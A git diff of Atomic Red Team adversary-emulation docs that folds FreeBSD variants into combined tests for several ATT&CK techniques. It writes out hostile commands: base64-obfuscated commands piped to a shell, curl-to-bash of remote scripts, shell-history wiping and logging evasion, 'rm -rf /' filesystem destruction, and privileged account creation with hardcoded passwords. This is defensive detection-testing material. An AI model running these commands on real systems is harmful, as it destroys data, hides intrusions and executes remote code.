+[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
+ART=$(echo -n "id" | $encodecmd)
 echo "\$ART=$ART"
-echo -n "$ART" |base64 -d |/bin/bash
+echo -n "$ART" | $decodecmd |/bin/bash
 unset ART
 ```
 
@@ -374,38 +367,7 @@ unset ART
 <br/>
 <br/>
 
-## Atomic Test #10 - Obfuscated command line scripts (freebsd)
-An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ART=$(echo -n "id" |b64encode -r -)
-echo "\$ART=$ART"
-echo -n "$ART" |b64decode -r |/bin/sh
-unset ART
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Change login shell
+## Atomic Test #10 - Change login shell
 An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
 
 **Supported Platforms:** Linux
@@ -422,7 +384,7 @@ An adversary may want to use a different login shell. The chsh command changes t
 
 
 ```bash
-useradd -s /bin/bash art
+[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
 cat /etc/passwd |grep ^art
 chsh -s /bin/sh art
 cat /etc/passwd |grep ^art
@@ -430,7 +392,7 @@ cat /etc/passwd |grep ^art
 
 #### Cleanup Commands:
 ```bash
-userdel art
+[ "$(uname)" = 'FreeBSD' ] && rmuser -y art || userdel art
 ```
 
 
@@ -452,54 +414,7 @@ echo "Automated installer not implemented yet, please install chsh manually"
 <br/>
 <br/>
 
-## Atomic Test #12 - Change login shell (freebsd)
-An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-pw useradd art -g wheel -s /bin/csh
-cat /etc/passwd |grep ^art
-chsh -s /bin/sh art
-cat /etc/passwd |grep ^art
-```
-
-#### Cleanup Commands:
-```sh
-rmuser -y art
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: chsh - change login shell, must be installed
-##### Check Prereq Commands:
-```sh
-if [ -f /usr/bin/chsh ]; then echo "exit 0"; else echo "exit 1"; exit 1; fi
-```
-##### Get Prereq Commands:
-```sh
-echo "Automated installer not implemented yet, please install chsh manually"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Environment variable scripts
+## Atomic Test #11 - Environment variable scripts
 An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
 
 **Supported Platforms:** Linux
@@ -512,39 +427,6 @@ An adversary may place scripts in an environment variable because they can't or
 
 
 
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-export ART='echo "Atomic Red Team was here... T1059.004"'
-echo $ART |/bin/bash
-```
-
-#### Cleanup Commands:
-```bash
-unset ART
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #14 - Environment variable scripts (freebsd)
-An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee
-
-
-
-
-
-
 #### Attack Commands: Run with `sh`! 
 
 
@@ -565,7 +447,7 @@ unset ART
 <br/>
 <br/>
 
-## Atomic Test #15 - Detecting pipe-to-shell
+## Atomic Test #12 - Detecting pipe-to-shell
 An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
 
 **Supported Platforms:** Linux
@@ -583,34 +465,31 @@ An adversary may develop a useful utility or subvert the CI/CD pipe line of a le
 | remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh|
 
 
-#### Attack Commands: Run with `bash`! 
+#### Attack Commands: Run with `sh`! 
 
 
-```bash
+```sh
 cd /tmp
-curl -s #{remote_url}
-ls -la /tmp/art.txt
 curl -s #{remote_url} |bash
 ls -la /tmp/art.txt
 ```
 
 #### Cleanup Commands:
-```bash
+```sh
 rm /tmp/art.txt
 ```
 
 
 
 #### Dependencies:  Run with `bash`!
-##### Description: Check if running on a Debian based machine.
+##### Description: Check if curl is installed on the machine.
 ##### Check Prereq Commands:
 ```bash
-if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi
 if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```bash
-apt update && apt install -y curl
+which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
 ```
 
 
@@ -619,61 +498,7 @@ apt update && apt install -y curl
 <br/>
 <br/>
 
-## Atomic Test #16 - Detecting pipe-to-shell (freebsd)
-An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632
-
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/pipe-to-shell.sh|
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cd /tmp
-curl -s #{remote_url}
-ls -la /tmp/art.txt
-curl -s #{remote_url} |bash
-ls -la /tmp/art.txt
-```
-
-#### Cleanup Commands:
-```sh
-rm /tmp/art.txt
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Check if running on a Debian based machine.
-##### Check Prereq Commands:
-```sh
-if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi
-if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
-```
-##### Get Prereq Commands:
-```sh
-pkg update && pkg install -y curl
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - Current kernel information enumeration
+## Atomic Test #13 - Current kernel information enumeration
 An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
 
 **Supported Platforms:** Linux
diff --git a/atomics/T1070.003/T1070.003.md b/atomics/T1070.003/T1070.003.md
index 2870812d3..ed14bcd04 100644
--- a/atomics/T1070.003/T1070.003.md
+++ b/atomics/T1070.003/T1070.003.md
@@ -18,41 +18,27 @@ Adversaries may run the PowerShell command <code>Clear-History</code> to flush t
 
 - [Atomic Test #1 - Clear Bash history (rm)](#atomic-test-1---clear-bash-history-rm)
 
-- [Atomic Test #2 - Clear sh history (rm)](#atomic-test-2---clear-sh-history-rm)
+- [Atomic Test #2 - Clear Bash history (echo)](#atomic-test-2---clear-bash-history-echo)
 
-- [Atomic Test #3 - Clear Bash history (echo)](#atomic-test-3---clear-bash-history-echo)
+- [Atomic Test #3 - Clear Bash history (cat dev/null)](#atomic-test-3---clear-bash-history-cat-devnull)
 
-- [Atomic Test #4 - Clear sh history (echo)](#atomic-test-4---clear-sh-history-echo)
+- [Atomic Test #4 - Clear Bash history (ln dev/null)](#atomic-test-4---clear-bash-history-ln-devnull)
 
-- [Atomic Test #5 - Clear Bash history (cat dev/null)](#atomic-test-5---clear-bash-history-cat-devnull)
+- [Atomic Test #5 - Clear Bash history (truncate)](#atomic-test-5---clear-bash-history-truncate)
 
-- [Atomic Test #6 - Clear sh history (cat dev/null)](#atomic-test-6---clear-sh-history-cat-devnull)
+- [Atomic Test #6 - Clear history of a bunch of shells](#atomic-test-6---clear-history-of-a-bunch-of-shells)
 
-- [Atomic Test #7 - Clear Bash history (ln dev/null)](#atomic-test-7---clear-bash-history-ln-devnull)
+- [Atomic Test #7 - Clear and Disable Bash History Logging](#atomic-test-7---clear-and-disable-bash-history-logging)
 
-- [Atomic Test #8 - Clear sh history (ln dev/null)](#atomic-test-8---clear-sh-history-ln-devnull)
+- [Atomic Test #8 - Use Space Before Command to Avoid Logging to History](#atomic-test-8---use-space-before-command-to-avoid-logging-to-history)
 
-- [Atomic Test #9 - Clear Bash history (truncate)](#atomic-test-9---clear-bash-history-truncate)
+- [Atomic Test #9 - Disable Bash History Logging with SSH -T](#atomic-test-9---disable-bash-history-logging-with-ssh--t)
 
-- [Atomic Test #10 - Clear sh history (truncate)](#atomic-test-10---clear-sh-history-truncate)
+- [Atomic Test #10 - Prevent Powershell History Logging](#atomic-test-10---prevent-powershell-history-logging)
 
-- [Atomic Test #11 - Clear history of a bunch of shells](#atomic-test-11---clear-history-of-a-bunch-of-shells)
+- [Atomic Test #11 - Clear Powershell History by Deleting History File](#atomic-test-11---clear-powershell-history-by-deleting-history-file)
 
-- [Atomic Test #12 - Clear history of a bunch of shells (freebsd)](#atomic-test-12---clear-history-of-a-bunch-of-shells-freebsd)
-
-- [Atomic Test #13 - Clear and Disable Bash History Logging](#atomic-test-13---clear-and-disable-bash-history-logging)
-
-- [Atomic Test #14 - Use Space Before Command to Avoid Logging to History](#atomic-test-14---use-space-before-command-to-avoid-logging-to-history)
-
-- [Atomic Test #15 - Disable Bash History Logging with SSH -T](#atomic-test-15---disable-bash-history-logging-with-ssh--t)
-
-- [Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)](#atomic-test-16---disable-sh-history-logging-with-ssh--t-freebsd)
-
-- [Atomic Test #17 - Prevent Powershell History Logging](#atomic-test-17---prevent-powershell-history-logging)
-
-- [Atomic Test #18 - Clear Powershell History by Deleting History File](#atomic-test-18---clear-powershell-history-by-deleting-history-file)
-
-- [Atomic Test #19 - Set Custom AddToHistoryHandler to Avoid History File Logging](#atomic-test-19---set-custom-addtohistoryhandler-to-avoid-history-file-logging)
+- [Atomic Test #12 - Set Custom AddToHistoryHandler to Avoid History File Logging](#atomic-test-12---set-custom-addtohistoryhandler-to-avoid-history-file-logging)
 
 
 <br/>
@@ -69,12 +55,17 @@ Clears bash history via rm
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-rm ~/.bash_history
+rm #{history_path}
 ```
 
 
@@ -85,35 +76,7 @@ rm ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #2 - Clear sh history (rm)
-Clears sh history via rm
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 448893f8-1d5d-4ae2-9017-7fcd73a7e100
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-rm ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Clear Bash history (echo)
+## Atomic Test #2 - Clear Bash history (echo)
 Clears bash history via echo
 
 **Supported Platforms:** Linux
@@ -125,12 +88,17 @@ Clears bash history via echo
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-echo "" > ~/.bash_history
+echo "" > #{history_path}
 ```
 
 
@@ -141,35 +109,7 @@ echo "" > ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #4 - Clear sh history (echo)
-Clears sh history via echo
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** a4d63cb3-9ed9-4837-9480-5bf6b09a6c96
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-echo "" > ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #5 - Clear Bash history (cat dev/null)
+## Atomic Test #3 - Clear Bash history (cat dev/null)
 Clears bash history via cat /dev/null
 
 **Supported Platforms:** Linux, macOS
@@ -181,12 +121,17 @@ Clears bash history via cat /dev/null
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-cat /dev/null > ~/.bash_history
+cat /dev/null > #{history_path}
 ```
 
 
@@ -197,35 +142,7 @@ cat /dev/null > ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #6 - Clear sh history (cat dev/null)
-Clears sh history via cat /dev/null
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** ecaefd53-6fa4-4781-ba51-d9d6fb94dbdc
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-cat /dev/null > ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #7 - Clear Bash history (ln dev/null)
+## Atomic Test #4 - Clear Bash history (ln dev/null)
 Clears bash history via a symlink to /dev/null
 
 **Supported Platforms:** Linux, macOS
@@ -237,12 +154,17 @@ Clears bash history via a symlink to /dev/null
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-ln -sf /dev/null ~/.bash_history
+ln -sf /dev/null #{history_path}
 ```
 
 
@@ -253,35 +175,7 @@ ln -sf /dev/null ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #8 - Clear sh history (ln dev/null)
-Clears sh history via a symlink to /dev/null
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 3126aa7a-8768-456f-ae05-6ab2d4accfdd
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-ln -sf /dev/null ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Clear Bash history (truncate)
+## Atomic Test #5 - Clear Bash history (truncate)
 Clears bash history via truncate
 
 **Supported Platforms:** Linux
@@ -293,12 +187,17 @@ Clears bash history via truncate
 
 
 
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| history_path | Bash history path | path | ~/.bash_history|
+
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-truncate -s0 ~/.bash_history
+truncate -s0 #{history_path}
 ```
 
 
@@ -309,35 +208,7 @@ truncate -s0 ~/.bash_history
 <br/>
 <br/>
 
-## Atomic Test #10 - Clear sh history (truncate)
-Clears sh history via truncate
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** e14d9bb0-c853-4503-aa89-739d5c0a5818
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-truncate -s0 ~/.sh_history
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #11 - Clear history of a bunch of shells
+## Atomic Test #6 - Clear history of a bunch of shells
 Clears the history of a bunch of different shell types by setting the history size to zero
 
 **Supported Platforms:** Linux, macOS
@@ -367,39 +238,7 @@ history -c
 <br/>
 <br/>
 
-## Atomic Test #12 - Clear history of a bunch of shells (freebsd)
-Clears the history of a bunch of different shell types by setting the history size to zero
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 9bf7c8af-5e12-42ea-bf6b-b0348fb9dfb0
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-unset HISTFILE
-unset histfile
-export HISTFILESIZE=0
-export HISTSIZE=0
-history -c
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #13 - Clear and Disable Bash History Logging
+## Atomic Test #7 - Clear and Disable Bash History Logging
 Clears the history and disable bash history logging of the current shell and future shell sessions
 
 **Supported Platforms:** Linux, macOS
@@ -436,7 +275,7 @@ set -o history
 <br/>
 <br/>
 
-## Atomic Test #14 - Use Space Before Command to Avoid Logging to History
+## Atomic Test #8 - Use Space Before Command to Avoid Logging to History
 Using a space before a command causes the command to not be logged in the Bash History file
 
 **Supported Platforms:** Linux, macOS
@@ -465,7 +304,7 @@ whoami
 <br/>
 <br/>
 
-## Atomic Test #15 - Disable Bash History Logging with SSH -T
+## Atomic Test #9 - Disable Bash History Logging with SSH -T
 Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
 
 **Supported Platforms:** Linux
@@ -487,7 +326,7 @@ sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname
 
 #### Cleanup Commands:
 ```sh
-userdel -f testuser1
+[ "$(uname)" = 'FreeBSD' ] && rmuser -y testuser1 || userdel -f testuser1
 ```
 
 
@@ -500,9 +339,9 @@ $(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)
 ```
 ##### Get Prereq Commands:
 ```sh
-/usr/sbin/useradd testuser1
-echo -e 'pwd101!\npwd101!' | passwd testuser1
-(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)
+[ "$(uname)" = 'FreeBSD' ] && pw useradd testuser1 -g wheel -s /bin/sh || /usr/sbin/useradd testuser1
+[ "$(uname)" = 'FreeBSD' ] && echo 'pwd101!' | pw mod user testuser1 -h 0 || echo -e 'pwd101!\npwd101!' | passwd testuser1
+(which yum && yum -y install epel-release sshpass)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y sshpass)||(which pkg && pkg install -y sshpass)
 ```
 
 
@@ -511,53 +350,7 @@ echo -e 'pwd101!\npwd101!' | passwd testuser1
 <br/>
 <br/>
 
-## Atomic Test #16 - Disable sh History Logging with SSH -T (freebsd)
-Keeps history clear and stays out of lastlog,wtmp,btmp ssh -T keeps the ssh client from catching a proper TTY, which is what usually gets logged on lastlog
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** ec3f2306-dd19-4c4b-bed7-92d20e9b1dee
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`! 
-
-
-```sh
-sshpass -p 'pwd101!' ssh testuser1@localhost -T hostname
-```
-
-#### Cleanup Commands:
-```sh
-rmuser -y testuser1
-```
-
-
-
-#### Dependencies:  Run with `sh`!
-##### Description: Install sshpass and create user account used for excuting
-##### Check Prereq Commands:
-```sh
-$(getent passwd testuser1 >/dev/null) && $(which sshpass >/dev/null)
-```
-##### Get Prereq Commands:
-```sh
-pw useradd testuser1 -g wheel -s /bin/sh
-echo 'pwd101!' | pw mod user testuser1 -h 0
-(which pkg && pkg install -y sshpass)
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #17 - Prevent Powershell History Logging
+## Atomic Test #10 - Prevent Powershell History Logging
 Prevents Powershell history
 
 **Supported Platforms:** Windows
@@ -589,7 +382,7 @@ Set-PSReadLineOption -HistorySaveStyle SaveIncrementally
 <br/>
 <br/>
 
-## Atomic Test #18 - Clear Powershell History by Deleting History File
+## Atomic Test #11 - Clear Powershell History by Deleting History File
 Clears Powershell history
 
 **Supported Platforms:** Windows
@@ -617,7 +410,7 @@ Remove-Item (Get-PSReadlineOption).HistorySavePath
 <br/>
 <br/>
 
-## Atomic Test #19 - Set Custom AddToHistoryHandler to Avoid History File Logging
+## Atomic Test #12 - Set Custom AddToHistoryHandler to Avoid History File Logging
 The "AddToHistoryHandler" receives the current command as the $line variable and then returns $true if 
 the line should be written to the history file. Here we simply return $false so nothing gets added to 
 the history file for the current session.
diff --git a/atomics/T1070.004/T1070.004.md b/atomics/T1070.004/T1070.004.md
index 87ea4a1f9..f4f4893d2 100644
--- a/atomics/T1070.004/T1070.004.md
+++ b/atomics/T1070.004/T1070.004.md
@@ -22,11 +22,9 @@ There are tools available from the host operating system to perform cleanup, but
 
 - [Atomic Test #8 - Delete Filesystem - Linux](#atomic-test-8---delete-filesystem---linux)
 
-- [Atomic Test #9 - Delete Filesystem - FreeBSD](#atomic-test-9---delete-filesystem---freebsd)
+- [Atomic Test #9 - Delete Prefetch File](#atomic-test-9---delete-prefetch-file)
 
-- [Atomic Test #10 - Delete Prefetch File](#atomic-test-10---delete-prefetch-file)
-
-- [Atomic Test #11 - Delete TeamViewer Log Files](#atomic-test-11---delete-teamviewer-log-files)
+- [Atomic Test #10 - Delete TeamViewer Log Files](#atomic-test-10---delete-teamviewer-log-files)
 
 
 <br/>
@@ -354,40 +352,11 @@ This test deletes the entire root filesystem of a Linux system. This technique w
 
 
 
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-rm -rf / --no-preserve-root > /dev/null 2> /dev/null
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #9 - Delete Filesystem - FreeBSD
-This test deletes the entire root filesystem of a FreeBSD system. This technique was used by Amnesia IoT malware to avoid analysis. This test is dangerous and destructive, do NOT use on production equipment.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** b5aaca7e-a48f-4f1b-8f0f-a27b8f516608
-
-
-
-
-
-
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-chflags -R 0 /
-rm -rf / > /dev/null 2> /dev/null
+[ "$(uname)" = 'Linux' ] && rm -rf / --no-preserve-root > /dev/null 2> /dev/null || chflags -R 0 / && rm -rf / > /dev/null 2> /dev/null
 ```
 
 
@@ -398,7 +367,7 @@ rm -rf / > /dev/null 2> /dev/null
 <br/>
 <br/>
 
-## Atomic Test #10 - Delete Prefetch File
+## Atomic Test #9 - Delete Prefetch File
 Delete a single prefetch file.  Deletion of prefetch files is a known anti-forensic technique. To verify execution, Run "(Get-ChildItem -Path "$Env:SystemRoot\prefetch\*.pf" | Measure-Object).Count"
 before and after the test to verify that the number of prefetch files decreases by 1.
 
@@ -427,7 +396,7 @@ Remove-Item -Path (Join-Path "$Env:SystemRoot\prefetch\" (Get-ChildItem -Path "$
 <br/>
 <br/>
 
-## Atomic Test #11 - Delete TeamViewer Log Files
+## Atomic Test #10 - Delete TeamViewer Log Files
 Adversaries may delete TeamViewer log files to hide activity. This should provide a high true-positive alert ration.
 This test just places the files in a non-TeamViewer folder, a detection would just check for a deletion event matching the TeamViewer
 log file format of TeamViewer_##.log. Upon execution, no output will be displayed. Use File Explorer to verify the folder was deleted.
diff --git a/atomics/T1074.001/T1074.001.md b/atomics/T1074.001/T1074.001.md
index 81abcf9b1..e5d8fd30c 100644
--- a/atomics/T1074.001/T1074.001.md
+++ b/atomics/T1074.001/T1074.001.md
@@ -10,9 +10,7 @@ Adversaries may also stage collected data in various available formats/locations
 
 - [Atomic Test #2 - Stage data from Discovery.sh](#atomic-test-2---stage-data-from-discoverysh)
 
-- [Atomic Test #3 - Stage data from Discovery.sh (freebsd)](#atomic-test-3---stage-data-from-discoverysh-freebsd)
-
-- [Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-4---zip-a-folder-with-powershell-for-staging-in-temp)
+- [Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp](#atomic-test-3---zip-a-folder-with-powershell-for-staging-in-temp)
 
 
 <br/>
@@ -67,39 +65,6 @@ Utilize curl to download discovery.sh and execute a basic information gathering
 
 
 
-#### Inputs:
-| Name | Description | Type | Default Value |
-|------|-------------|------|---------------|
-| output_file | Location to save downloaded discovery.bat file | path | /tmp/T1074.001_discovery.log|
-
-
-#### Attack Commands: Run with `bash`! 
-
-
-```bash
-curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file}
-```
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Stage data from Discovery.sh (freebsd)
-Utilize curl to download discovery.sh and execute a basic information gathering shell script
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 4fca7b49-379d-4493-8890-d6297750fa46
-
-
-
-
-
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
@@ -113,18 +78,22 @@ Utilize curl to download discovery.sh and execute a basic information gathering
 curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | sh -s > #{output_file}
 ```
 
+#### Cleanup Commands:
+```sh
+rm #{output_file}
+```
 
 
 
 #### Dependencies:  Run with `sh`!
-##### Description: Check if curl is installed.
+##### Description: Check if curl is installed on the machine.
 ##### Check Prereq Commands:
 ```sh
-if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi;
+if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
 ```
 ##### Get Prereq Commands:
 ```sh
-(which pkg && pkg install -y curl)
+which apt && apt update && apt install -y curl || which pkg && pkg update && pkg install -y curl
 ```
 
 
@@ -133,7 +102,7 @@ if [ ! -x "$(command -v curl)" ]; then exit 1; else exit 0; fi;
 <br/>
 <br/>
 
-## Atomic Test #4 - Zip a Folder with PowerShell for Staging in Temp
+## Atomic Test #3 - Zip a Folder with PowerShell for Staging in Temp
 Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration. Upon execution, Verify that a zipped folder named Folder_to_zip.zip
 was placed in the temp directory.
 
diff --git a/atomics/T1078.003/T1078.003.md b/atomics/T1078.003/T1078.003.md
index fefdeb4f0..86375758f 100644
--- a/atomics/T1078.003/T1078.003.md
+++ b/atomics/T1078.003/T1078.003.md
@@ -22,15 +22,13 @@ Local Accounts may also be abused to elevate privileges and harvest credentials
 
 - [Atomic Test #8 - Create local account (Linux)](#atomic-test-8---create-local-account-linux)
 
-- [Atomic Test #9 - Create local account (FreeBSD)](#atomic-test-9---create-local-account-freebsd)
+- [Atomic Test #9 - Reactivate a locked/expired account (Linux)](#atomic-test-9---reactivate-a-lockedexpired-account-linux)
 
-- [Atomic Test #10 - Reactivate a locked/expired account (Linux)](#atomic-test-10---reactivate-a-lockedexpired-account-linux)
+- [Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)](#atomic-test-10---reactivate-a-lockedexpired-account-freebsd)
 
-- [Atomic Test #11 - Reactivate a locked/expired account (FreeBSD)](#atomic-test-11---reactivate-a-lockedexpired-account-freebsd)
+- [Atomic Test #11 - Login as nobody (Linux)](#atomic-test-11---login-as-nobody-linux)
 
-- [Atomic Test #12 - Login as nobody (Linux)](#atomic-test-12---login-as-nobody-linux)
-
-- [Atomic Test #13 - Login as nobody (freebsd)](#atomic-test-13---login-as-nobody-freebsd)
+- [Atomic Test #12 - Login as nobody (freebsd)](#atomic-test-12---login-as-nobody-freebsd)
 
 
 <br/>
@@ -289,15 +287,14 @@ An adversary may wish to create an account with admin privileges to work with. I
 
 
 ```bash
-useradd --shell /bin/bash --create-home --password $(openssl passwd -1 art) art
-su art
-whoami
-exit
+password=$(openssl passwd -1 art)
+([ "$(uname)" = 'Linux' ] && useradd --shell /bin/bash --create-home --password $password art) || (pw useradd art -g wheel -s /bin/sh && (echo $password | pw mod user testuser1 -h 0))
+su art -c "whoami; exit"
 ```
 
 #### Cleanup Commands:
 ```bash
-userdel -r art
+[ "$(uname)" = 'Linux' ] && userdel art -rf || rmuser -y art
 ```
 
 
@@ -307,43 +304,7 @@ userdel -r art
 <br/>
 <br/>
 
-## Atomic Test #9 - Create local account (FreeBSD)
-An adversary may wish to create an account with admin privileges to work with. In this test we create a "art" user with the password art, switch to art, execute whoami, exit and delete the art user.
-
-**Supported Platforms:** Linux
-
-
-**auto_generated_guid:** 95158cc9-8f6d-4889-9531-9be3f7f095e0
-
-
-
-
-
-
-#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
-
-
-```sh
-pw useradd art -g wheel -s /bin/sh
-echo $(openssl passwd -1 art) | pw mod user testuser1 -h 0      
-su art
-whoami
-exit
-```
-
-#### Cleanup Commands:
-```sh
-rmuser -y art
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #10 - Reactivate a locked/expired account (Linux)
+## Atomic Test #9 - Reactivate a locked/expired account (Linux)
 A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 
 
 In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
@@ -384,7 +345,7 @@ userdel -r art
 <br/>
 <br/>
 
-## Atomic Test #11 - Reactivate a locked/expired account (FreeBSD)
+## Atomic Test #10 - Reactivate a locked/expired account (FreeBSD)
 A system administrator may have locked and expired a user account rather than deleting it. "the user is coming back, at some stage" An adversary may reactivate a inactive account in an attempt to appear legitimate. 
 
 In this test we create a "art" user with the password art, lock and expire the account, try to su to art and fail, unlock and renew the account, su successfully, then delete the account.
@@ -426,7 +387,7 @@ rmuser -y art
 <br/>
 <br/>
 
-## Atomic Test #12 - Login as nobody (Linux)
+## Atomic Test #11 - Login as nobody (Linux)
